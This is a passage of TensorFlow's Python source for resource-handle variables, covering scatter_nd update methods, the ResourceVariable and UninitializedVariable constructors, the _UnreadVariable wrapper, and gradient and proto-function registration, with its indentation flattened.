It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
    For example, say we want to update 4 scattered elements in a rank-1 tensor
    with 8 elements. In Python, that update would look like this:
```python
ref = tf.Variable([1, 2, 3, 4, 5, 6, 7, 8])
indices = tf.constant([[4], [3], [1] ,[7]])
updates = tf.constant([9, 10, 11, 12])
op = ref.scatter_nd_update(indices, updates)
with tf.compat.v1.Session() as sess:
          print(sess.run(op))
```
The resulting update to ref would look like this:
[1, 11, 3, 10, 9, 6, 7, 12]
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_update(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_max(self, indices, updates, name=None):
"""Updates this variable with the max of `tf.IndexedSlices` and itself.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_max(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
def scatter_nd_min(self, indices, updates, name=None):
"""Updates this variable with the min of `tf.IndexedSlices` and itself.
`ref` is a `Tensor` with rank `P` and `indices` is a `Tensor` of rank `Q`.
`indices` must be integer tensor, containing indices into `ref`.
It must be shape `[d_0, ..., d_{Q-2}, K]` where `0 < K <= P`.
The innermost dimension of `indices` (with length `K`) corresponds to
indices into elements (if `K = P`) or slices (if `K < P`) along the `K`th
dimension of `ref`.
`updates` is `Tensor` of rank `Q-1+P-K` with shape:
```
[d_0, ..., d_{Q-2}, ref.shape[K], ..., ref.shape[P-1]].
```
See `tf.scatter_nd` for more details about how to make updates to
slices.
Args:
indices: The indices to be used in the operation.
updates: The values to be used in the operation.
name: the name of the operation.
Returns:
The updated variable.
"""
return self._lazy_read(
gen_state_ops.resource_scatter_nd_min(
self.handle,
indices,
ops.convert_to_tensor(updates, self.dtype),
name=name))
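
  # A hedged usage sketch (illustrative, eager mode): scatter_nd_max keeps the
  # element-wise maximum of the current value and the update at each index
  # (scatter_nd_min is the mirror image):
  #   >>> v = tf.Variable([1., 5., 3.])
  #   >>> v.scatter_nd_max([[0], [2]], [4., 2.]).numpy()
  #   array([4., 5., 3.], dtype=float32)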
def _write_object_proto(self, proto, options):
"""Writes additional information of the variable into the SavedObject proto.
Subclasses of ResourceVariables could choose to override this method to
customize extra information to provide when saving a SavedModel.
Ideally, this should contain the logic in
write_object_proto_for_resource_variable but `DistributedValue` is an
    outlier at the moment. Once `DistributedValue` becomes a proper
ResourceVariable, we should remove the helper method below.
Args:
proto: `SavedObject` proto to update.
options: A `SaveOption` instance that configures save behavior.
"""
write_object_proto_for_resource_variable(self, proto, options)
def _strided_slice_assign(self, begin, end, strides, value, name, begin_mask,
end_mask, ellipsis_mask, new_axis_mask,
shrink_axis_mask):
with _handle_graph(self.handle), self._assign_dependencies():
return self._lazy_read(
gen_array_ops.resource_strided_slice_assign(
ref=self.handle,
begin=begin,
end=end,
strides=strides,
value=ops.convert_to_tensor(value, dtype=self.dtype),
name=name,
begin_mask=begin_mask,
end_mask=end_mask,
ellipsis_mask=ellipsis_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask))
def __complex__(self):
return complex(self.value().numpy())
def __int__(self):
return int(self.value().numpy())
def __long__(self):
return long(self.value().numpy())
def __float__(self):
return float(self.value().numpy())
def _dense_var_to_tensor(self, dtype=None, name=None, as_ref=False):
del name
if dtype is not None and not dtype.is_compatible_with(self.dtype):
raise ValueError(
f"Incompatible type conversion requested to type {dtype.name} for "
f"`tf.Variable of type {self.dtype.name}. (Variable: {self})")
if as_ref:
return self.read_value().op.inputs[0]
else:
return self.value()
def __iadd__(self, unused_other):
raise RuntimeError("`variable += value` with `tf.Variable`s is not "
"supported. Use `variable.assign_add(value)` to modify "
"the variable, or `out = variable + value` if you "
"need to get a new output Tensor.")
def __isub__(self, unused_other):
raise RuntimeError("`variable -= value` with `tf.Variable`s is not "
"supported. Use `variable.assign_sub(value)` to modify "
"the variable, or `out = variable * value` if you "
"need to get a new output Tensor.")
def __imul__(self, unused_other):
raise RuntimeError("`var *= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var * value)` to modify "
"the variable, or `out = var * value` if you "
"need to get a new output Tensor.")
def __idiv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __itruediv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __irealdiv__(self, unused_other):
raise RuntimeError("`var /= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var / value)` to modify "
"the variable, or `out = var / value` if you "
"need to get a new output Tensor.")
def __ipow__(self, unused_other):
raise RuntimeError("`var **= value` with `tf.Variable`s is not "
"supported. Use `var.assign(var ** value)` to modify "
"the variable, or `out = var ** value` if you "
"need to get a new output Tensor.")
class ResourceVariable(BaseResourceVariable):
"""Variable based on resource handles.
See the [Variables How To](https://tensorflow.org/guide/variables)
for a high level overview.
A `ResourceVariable` allows you to maintain state across subsequent calls to
session.run.
The `ResourceVariable` constructor requires an initial value for the variable,
which can be a `Tensor` of any type and shape. The initial value defines the
type and shape of the variable. After construction, the type and shape of
the variable are fixed. The value can be changed using one of the assign
methods.
Just like any `Tensor`, variables created with
`tf.Variable(use_resource=True)` can be used as inputs for other Ops in the
graph. Additionally, all the operators overloaded for the `Tensor` class are
carried over to variables, so you can also add nodes to the graph by just
doing arithmetic on variables.
Unlike ref-based variables, a ResourceVariable has well-defined semantics. Each
usage of a ResourceVariable in a TensorFlow graph adds a read_value operation
to the graph. The Tensors returned by a read_value operation are guaranteed to
see all modifications to the value of the variable which happen in any
operation on which the read_value depends (either directly, indirectly, or
via a control dependency) and guaranteed to not see any modification to the
value of the variable from operations that depend on the read_value operation.
Updates from operations that have no dependency relationship to the read_value
operation might or might not be visible to read_value.
For example, if there is more than one assignment to a ResourceVariable in
a single session.run call there is a well-defined value for each operation
which uses the variable's value if the assignments and the read are connected
by edges in the graph. Consider the following example, in which two writes
can cause tf.Variable and tf.ResourceVariable to behave differently:
```python
a = tf.Variable(1.0, use_resource=True)
a.initializer.run()
assign = a.assign(2.0)
with tf.control_dependencies([assign]):
b = a.read_value()
with tf.control_dependencies([b]):
other_assign = a.assign(3.0)
with tf.control_dependencies([other_assign]):
# Will print 2.0 because the value was read before other_assign ran. If
# `a` was a tf.Variable instead, 2.0 or 3.0 could be printed.
tf.compat.v1.Print(b, [b]).eval()
```
"""
def __init__(
self, # pylint: disable=super-init-not-called
initial_value=None,
trainable=None,
collections=None,
validate_shape=True, # pylint: disable=unused-argument
caching_device=None,
name=None,
dtype=None,
variable_def=None,
import_scope=None,
constraint=None,
distribute_strategy=None,
synchronization=None,
aggregation=None,
shape=None):
"""Creates a variable.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. Can also be a callable with
no argument that returns the initial value when called. (Note that
initializer functions from init_ops.py must first be bound to a shape
before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
Defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: Ignored. Provided for compatibility with tf.Variable.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type. If None,
either the datatype will be kept (if initial_value is a Tensor) or
float32 will be used (if it is a Python object convertible to a Tensor).
variable_def: `VariableDef` protocol buffer. If not None, recreates the
`ResourceVariable` object with its contents. `variable_def` and other
arguments (except for import_scope) are mutually exclusive.
import_scope: Optional `string`. Name scope to add to the
ResourceVariable. Only used when `variable_def` is provided.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
distribute_strategy: The tf.distribute.Strategy this variable is being
created inside of.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
shape: (optional) The shape of this variable. If None, the shape of
`initial_value` will be used. When setting this argument to
`tf.TensorShape(None)` (representing an unspecified shape), the variable
can be assigned with values of different shapes.
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
@compatibility(eager)
When Eager Execution is enabled, the default for the `collections` argument
is `None`, which signifies that this `Variable` will not be added to any
collections.
@end_compatibility
"""
if variable_def:
if initial_value is not None:
raise ValueError(f"The variable_def and initial_value args to "
f"`tf.Variable` are mutually exclusive, but got both: "
f"variable_def={variable_def},\n"
f"initial_value={initial_value}")
if context.executing_eagerly():
raise ValueError(f"Creating a `tf.Variable` with a `variable_def` arg "
f"is not supported when eager execution is enabled. "
f"Got: variable_def={variable_def}")
self._init_from_proto(variable_def, import_scope=import_scope)
else:
self._init_from_args(
initial_value=initial_value,
trainable=trainable,
collections=collections,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
shape=shape,
distribute_strategy=distribute_strategy)
def _init_from_args(self,
initial_value=None,
trainable=None,
collections=None,
caching_device=None,
name=None,
dtype=None,
constraint=None,
synchronization=None,
aggregation=None,
distribute_strategy=None,
shape=None):
"""Creates a variable.
Args:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called.
(Note that initializer functions from init_ops.py must first be bound to
a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
Defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type. If None,
either the datatype will be kept (if initial_value is a Tensor) or
float32 will be used (if it is a Python object convertible to a Tensor).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
distribute_strategy: DistributionStrategy under which this variable was
created.
shape: (optional) The shape of this variable. If None, the shape of
`initial_value` will be used. When setting this argument to
`tf.TensorShape(None)` (representing an unspecified shape), the variable
can be assigned with values of different shapes.
Raises:
ValueError: If the initial value is not specified, or does not have a
shape and `validate_shape` is `True`.
@compatibility(eager)
When Eager Execution is enabled, variables are never added to collections.
It is not implicitly added to the `GLOBAL_VARIABLES` or
`TRAINABLE_VARIABLES` collections, and the `collections` argument is
ignored.
@end_compatibility
"""
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if initial_value is None:
raise ValueError("The `initial_value` arg to `tf.Variable` must "
"be specified except when you are not providing a "
"`variable_def`. You provided neither.")
init_from_fn = callable(initial_value)
if isinstance(initial_value, ops.Tensor) and hasattr(
initial_value, "graph") and initial_value.graph.building_function:
raise ValueError(f"Argument `initial_value` ({initial_value}) could not "
"be lifted out of a `tf.function`. "
"(Tried to create variable with name='{name}'). "
"To avoid this error, when constructing `tf.Variable`s "
"inside of `tf.function` you can create the "
"`initial_value` tensor in a "
"`tf.init_scope` or pass a callable `initial_value` "
"(e.g., `tf.Variable(lambda : "
"tf.truncated_normal([10, 40]))`). "
"Please file a feature request if this "
"restriction inconveniences you.")
if collections is None:
collections = [ops.GraphKeys.GLOBAL_VARIABLES]
if not isinstance(collections, (list, tuple, set)):
raise ValueError(
f"collections argument to Variable constructor must be a list, "
f"tuple, or set. Got {collections} of type {type(collections)}")
if constraint is not None and not callable(constraint):
raise ValueError(f"Argument `constraint` must be None or a callable. "
f"a callable. Got a {type(constraint)}: {constraint}")
if trainable and ops.GraphKeys.TRAINABLE_VARIABLES not in collections:
collections = list(collections) + [ops.GraphKeys.TRAINABLE_VARIABLES]
with ops.init_scope():
self._in_graph_mode = not context.executing_eagerly()
with ops.name_scope(
name,
"Variable", [] if init_from_fn else [initial_value],
skip_on_eager=False) as name:
# pylint: disable=protected-access
handle_name = ops.name_from_scope_name(name)
if self._in_graph_mode:
shared_name = handle_name
unique_id = shared_name
else:
# When in eager mode use a uid for the shared_name, to prevent
# accidental sharing.
unique_id = "%s_%d" % (handle_name, ops.uid())
shared_name = None # Never shared
# Use attr_scope and device(None) to simulate the behavior of
# colocate_with when the variable we want to colocate with doesn't
# yet exist.
device_context_manager = (
ops.device if self._in_graph_mode else ops.NullContextmanager)
attr = attr_value_pb2.AttrValue(
list=attr_value_pb2.AttrValue.ListValue(
s=[compat.as_bytes("loc:@%s" % handle_name)]))
with ops.get_default_graph()._attr_scope({"_class": attr}):
with ops.name_scope("Initializer"), device_context_manager(None):
if init_from_fn:
initial_value = initial_value()
if isinstance(initial_value, trackable.CheckpointInitialValue):
self._maybe_initialize_trackable()
self._update_uid = initial_value.checkpoint_position.restore_uid
initial_value = initial_value.wrapped_value
initial_value = ops.convert_to_tensor(initial_value,
name="initial_value",
dtype=dtype)
if shape is not None:
if not initial_value.shape.is_compatible_with(shape):
raise ValueError(
f"In this `tf.Variable` creation, the initial value's shape "
f"({initial_value.shape}) is not compatible with "
f"the explicitly supplied `shape` argument ({shape}).")
else:
shape = initial_value.shape
handle = eager_safe_variable_handle(
initial_value=initial_value,
shape=shape,
shared_name=shared_name,
name=name,
graph_mode=self._in_graph_mode)
handle._parent_trackable = weakref.ref(self)
# pylint: disable=protected-access
if (self._in_graph_mode and initial_value is not None and
initial_value.op._get_control_flow_context() is not None):
raise ValueError(
f"The `initial_value` passed to `tf.Variable` {name} is from "
f"inside a control-flow construct, such as a loop or "
f"conditional. When creating a "
f"`tf.Variable` inside a loop or conditional, use a lambda as "
f"the `initial_value`. Got: initial_value=({initial_value})")
# pylint: enable=protected-access
dtype = initial_value.dtype.base_dtype
if self._in_graph_mode:
with ops.name_scope("IsInitialized"):
is_initialized_op = (
gen_resource_variable_ops.var_is_initialized_op(handle))
if initial_value is not None:
# pylint: disable=g-backslash-continuation
with ops.name_scope("Assign") as n, \
ops.colocate_with(None, ignore_existing=True), \
ops.device(handle.device):
# pylint: disable=protected-access
initializer_op = (
gen_resource_variable_ops.assign_variable_op(
handle,
variables._try_guard_against_uninitialized_dependencies(
name, initial_value),
name=n))
# pylint: enable=protected-access
# pylint: enable=g-backslash-continuation
with ops.name_scope("Read"):
# Manually assign reads to the handle's device to avoid log
# messages.
with ops.device(handle.device):
value = gen_resource_variable_ops.read_variable_op(handle, dtype)
_maybe_set_handle_data(dtype, handle, value)
graph_element = value
if caching_device is not None:
# Variables may be created in a tf.device() or ops.colocate_with()
# context. At the same time, users would expect caching device to
# be independent of this context, and/or would not expect the
# current device context to be merged with the caching device
# spec. Therefore we reset the colocation stack before creating
# the cached value. Note that resetting the colocation stack will
# also reset the device stack.
with ops.colocate_with(None, ignore_existing=True):
with ops.device(caching_device):
cached_value = array_ops.identity(value)
else:
cached_value = None
else:
gen_resource_variable_ops.assign_variable_op(handle, initial_value)
is_initialized_op = None
initializer_op = None
graph_element = None
if caching_device:
with ops.device(caching_device):
cached_value = gen_resource_variable_ops.read_variable_op(
handle, dtype)
_maybe_set_handle_data(dtype, handle, cached_value)
else:
cached_value = None
if cached_value is not None:
# Store the variable object so that the original variable can be
# accessed to generate functions that are compatible with SavedModel.
cached_value._cached_variable = weakref.ref(self) # pylint: disable=protected-access
if not context.executing_eagerly():
# Eager variables are only added to collections if they are part of an
# eager variable store (otherwise in an interactive session they would
# hog memory and cause OOM). This is done in ops/variable_scope.py.
ops.add_to_collections(collections, self)
elif ops.GraphKeys.GLOBAL_STEP in collections:
ops.add_to_collections(ops.GraphKeys.GLOBAL_STEP, self)
initial_value = initial_value if self._in_graph_mode else None
super(ResourceVariable, self).__init__(
trainable=trainable,
shape=shape,
dtype=dtype,
handle=handle,
synchronization=synchronization,
constraint=constraint,
aggregation=aggregation,
distribute_strategy=distribute_strategy,
name=name,
unique_id=unique_id,
handle_name=handle_name,
graph_element=graph_element,
initial_value=initial_value,
initializer_op=initializer_op,
is_initialized_op=is_initialized_op,
cached_value=cached_value,
caching_device=caching_device)
def _init_from_proto(self, variable_def, import_scope=None):
"""Initializes from `VariableDef` proto."""
# Note that init_from_proto is currently not supported in Eager mode.
assert not context.executing_eagerly()
self._in_graph_mode = True
assert isinstance(variable_def, variable_pb2.VariableDef)
if not variable_def.is_resource:
raise ValueError(f"The `variable_def` you passed to `tf.Variable` is "
f"Trying to restore a TF 1.x Reference Variable "
f"as a TF 2.x ResourceVariable. This is unsupported. "
f"Got variable_def={variable_def}")
# Create from variable_def.
g = ops.get_default_graph()
self._handle = g.as_graph_element(
ops.prepend_name_scope(
variable_def.variable_name, import_scope=import_scope))
self._shape = tensor_shape.TensorShape(self._handle.op.get_attr("shape"))
self._handle_name = self._handle.name
self._unique_id = self._handle_name
self._initializer_op = g.as_graph_element(
ops.prepend_name_scope(
variable_def.initializer_name, import_scope=import_scope))
# Check whether initial_value_name exists for backwards compatibility.
if (hasattr(variable_def, "initial_value_name") and
variable_def.initial_value_name):
self._initial_value = g.as_graph_element(
ops.prepend_name_scope(
variable_def.initial_value_name, import_scope=import_scope))
else:
self._initial_value = None
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
variable_def.synchronization, variable_def.aggregation,
variable_def.trainable, variable_def.variable_name))
self._synchronization = synchronization
self._aggregation = aggregation
self._trainable = trainable
if variable_def.snapshot_name:
snapshot = g.as_graph_element(
ops.prepend_name_scope(
variable_def.snapshot_name, import_scope=import_scope))
if snapshot.op.type != "ReadVariableOp":
self._cached_value = snapshot
else:
self._cached_value = None
while snapshot.op.type != "ReadVariableOp":
snapshot = snapshot.op.inputs[0]
self._graph_element = snapshot
else:
self._cached_value = None
# Legacy case for protos without the snapshot name; assume it's the
# following.
self._graph_element = g.get_tensor_by_name(self._handle.op.name +
"/Read/ReadVariableOp:0")
if variable_def.HasField("save_slice_info_def"):
self._save_slice_info = variables.Variable.SaveSliceInfo(
save_slice_info_def=variable_def.save_slice_info_def,
import_scope=import_scope)
else:
self._save_slice_info = None
self._caching_device = None
self._dtype = dtypes.as_dtype(self._handle.op.get_attr("dtype"))
self._constraint = None
class UninitializedVariable(BaseResourceVariable):
"""A variable with no initializer."""
def __init__( # pylint: disable=super-init-not-called
self,
trainable=None,
caching_device=None,
name=None,
shape=None,
dtype=None,
constraint=None,
synchronization=None,
aggregation=None,
extra_handle_data=None,
distribute_strategy=None,
**unused_kwargs):
"""Creates the variable handle.
Args:
trainable: If `True`, GradientTapes automatically watch uses of this
Variable.
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
shape: The variable's shape.
dtype: The variable's dtype.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
extra_handle_data: Optional, another resource handle or Tensor with handle
data to merge with `shape` and `dtype`.
distribute_strategy: The tf.distribute.Strategy this variable is being
created inside of.
"""
with ops.init_scope():
# Here we are detecting eagerness within an init_scope, so this will only
# be true when we are running in TF1 graph mode.
self._in_graph_mode = not context.executing_eagerly()
with ops.name_scope(name, "Variable", skip_on_eager=False) as name:
handle_name = ops.name_from_scope_name(name)
if self._in_graph_mode:
shared_name = handle_name
unique_id = shared_name
else:
unique_id = "%s_%d" % (handle_name, ops.uid())
shared_name = None # Never shared
handle = _variable_handle_from_shape_and_dtype(
shape=shape,
dtype=dtype,
shared_name=shared_name,
name=name,
graph_mode=self._in_graph_mode,
initial_value=extra_handle_data)
handle._parent_trackable = weakref.ref(self)
if self._in_graph_mode:
# We only need to add the read_variable_op in TF1.
with ops.name_scope("Read"):
# Manually assign reads to the handle's device to avoid log
# messages.
with ops.device(handle.device):
value = gen_resource_variable_ops.read_variable_op(handle, dtype)
_maybe_set_handle_data(dtype, handle, value)
graph_element = value
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, self)
# Do *not* add to TRAINABLE_VARIABLES here, even if self._trainable,
# because retraining or frozen use of imported SavedModels is
# controlled at higher levels of model building.
else:
graph_element = None
super(UninitializedVariable, self).__init__(
distribute_strategy=distribute_strategy,
shape=shape,
dtype=dtype,
unique_id=unique_id,
handle_name=handle_name,
constraint=constraint,
handle=handle,
graph_element=graph_element,
trainable=trainable,
synchronization=synchronization,
aggregation=aggregation,
in_graph_mode=self._in_graph_mode)
_pywrap_utils.RegisterType("ResourceVariable", ResourceVariable)
math_ops._resource_variable_type = ResourceVariable # pylint: disable=protected-access
def _dense_var_to_tensor(var, dtype=None, name=None, as_ref=False):
return var._dense_var_to_tensor(dtype=dtype, name=name, as_ref=as_ref) # pylint: disable=protected-access
# Register a conversion function which reads the value of the variable,
# allowing instances of the class to be used as tensors.
ops.register_tensor_conversion_function(BaseResourceVariable,
_dense_var_to_tensor)
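# For illustration (a sketch, not part of the registration machinery above):
# once the conversion function is registered, ordinary ops accept a variable
# directly, e.g.
#
#   v = tf.Variable([1.0, 2.0])
#   t = tf.convert_to_tensor(v)   # reads the variable's current value
#   s = tf.reduce_sum(v)          # implicit conversion happens here as well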
class _UnreadVariable(BaseResourceVariable):
"""Represents a future for a read of a variable.
Pretends to be the tensor if anyone looks.
"""
def __init__(self, handle, dtype, shape, in_graph_mode, parent_op,
unique_id):
if isinstance(handle, ops.EagerTensor):
handle_name = ""
else:
handle_name = handle.name
# Only create a graph_element if we're in session.run-land as only
# session.run requires a preexisting tensor to evaluate. Otherwise we can
# avoid accidentally reading the variable.
if context.executing_eagerly() or ops.inside_function():
graph_element = None
else:
with ops.control_dependencies([parent_op]):
graph_element = gen_resource_variable_ops.read_variable_op(
handle, dtype)
_maybe_set_handle_data(dtype, handle, graph_element)
super(_UnreadVariable, self).__init__(
handle=handle,
shape=shape,
handle_name=handle_name,
unique_id=unique_id,
dtype=dtype,
graph_element=graph_element)
self._parent_op = parent_op
@property
def name(self):
if self._in_graph_mode:
return self._parent_op.name
else:
return "UnreadVariable"
def value(self):
return self._read_variable_op()
def read_value(self):
return self._read_variable_op()
def _read_variable_op(self):
with ops.control_dependencies([self._parent_op]):
result = gen_resource_variable_ops.read_variable_op(
self._handle, self._dtype)
_maybe_set_handle_data(self._dtype, self._handle, result)
return result
def assign_sub(self, delta, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign_sub(delta, use_locking, name,
read_value)
def assign_add(self, delta, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign_add(delta, use_locking, name,
read_value)
def assign(self, value, use_locking=None, name=None, read_value=True):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).assign(value, use_locking, name,
read_value)
def scatter_sub(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_sub(sparse_delta, use_locking,
name)
def scatter_add(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_add(sparse_delta, use_locking,
name)
def scatter_max(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_max(sparse_delta, use_locking,
name)
def scatter_min(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_min(sparse_delta, use_locking,
name)
def scatter_mul(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_mul(sparse_delta, use_locking,
name)
def scatter_div(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_div(sparse_delta, use_locking,
name)
def scatter_update(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).scatter_update(sparse_delta, use_locking, name)
def batch_scatter_update(self, sparse_delta, use_locking=False, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).batch_scatter_update(sparse_delta, use_locking, name)
def scatter_nd_sub(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_sub(indices, updates, name)
def scatter_nd_add(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_add(indices, updates, name)
def scatter_nd_update(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable,
self).scatter_nd_update(indices, updates, name)
def scatter_nd_max(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_max(indices, updates, name)
def scatter_nd_min(self, indices, updates, name=None):
with ops.control_dependencies([self._parent_op]):
return super(_UnreadVariable, self).scatter_nd_min(indices, updates, name)
@property
def op(self):
"""The op for this variable."""
return self._parent_op
@ops.RegisterGradient("ReadVariableOp")
def _ReadGrad(_, grad):
"""Gradient for read op."""
return grad
def variable_shape(handle, out_type=dtypes.int32):
handle_data = get_eager_safe_handle_data(handle)
if handle_data is None or not handle_data.is_set:
return gen_resource_variable_ops.variable_shape(handle, out_type=out_type)
shape_proto = handle_data.shape_and_type[0].shape
if shape_proto.unknown_rank or any(x.size == -1 for x in shape_proto.dim):
return gen_resource_variable_ops.variable_shape(handle, out_type=out_type)
return constant_op.constant([x.size for x in shape_proto.dim], dtype=out_type)
@ops.RegisterGradient("ResourceGather")
def _GatherGrad(op, grad):
"""Gradient for gather op."""
# Build appropriately shaped IndexedSlices
handle = op.inputs[0]
indices = op.inputs[1]
params_shape = variable_shape(handle)
size = array_ops.expand_dims(array_ops.size(indices), 0)
values_shape = array_ops.concat([size, params_shape[1:]], 0)
values = array_ops.reshape(grad, values_shape)
indices = array_ops.reshape(indices, size)
return (indexed_slices.IndexedSlices(values, indices, params_shape), None)
def _to_proto_fn(v, export_scope=None):
"""Converts Variable and ResourceVariable to VariableDef for collections."""
return v.to_proto(export_scope=export_scope)
def _from_proto_fn(v, import_scope=None):
"""Creates Variable or ResourceVariable from VariableDef as needed."""
if v.is_resource:
return ResourceVariable.from_proto(v, import_scope=import_scope)
return variables.Variable.from_proto(v, import_scope=import_scope)
ops.register_proto_function(
ops.GraphKeys.GLOBAL_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
ops.GraphKeys.TRAINABLE_VARIABLES,
proto_type=variable_pb2.VariableDef,
to_proto=_to_proto_fn,
from_proto=_from_proto_fn)
ops.register_proto_function(
